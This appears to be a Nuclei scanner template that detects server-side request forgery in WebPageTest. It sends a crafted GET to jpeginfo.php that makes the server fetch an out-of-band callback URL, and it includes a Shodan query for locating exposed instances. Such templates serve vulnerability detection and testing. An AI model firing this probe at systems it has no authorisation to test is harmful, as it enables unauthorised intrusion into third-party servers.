id: webpagetest-ssrf

info:
  name: Web Page Test - Server Side Request Forgery (SSRF)
  author: pdteam
  severity: high
  reference:
    - https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/
    - https://github.com/WPO-Foundation/webpagetest
  metadata:
    verified: true
    shodan-query: title:"WebPageTest"
  tags: ssrf,webpagetest,oast

http:
  - method: GET
    path:
      - "{{BaseURL}}/jpeginfo/jpeginfo.php?url={{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "File is not a JPEG Image"

      - type: word
        part: interactsh_protocol
        words:
          - "http"
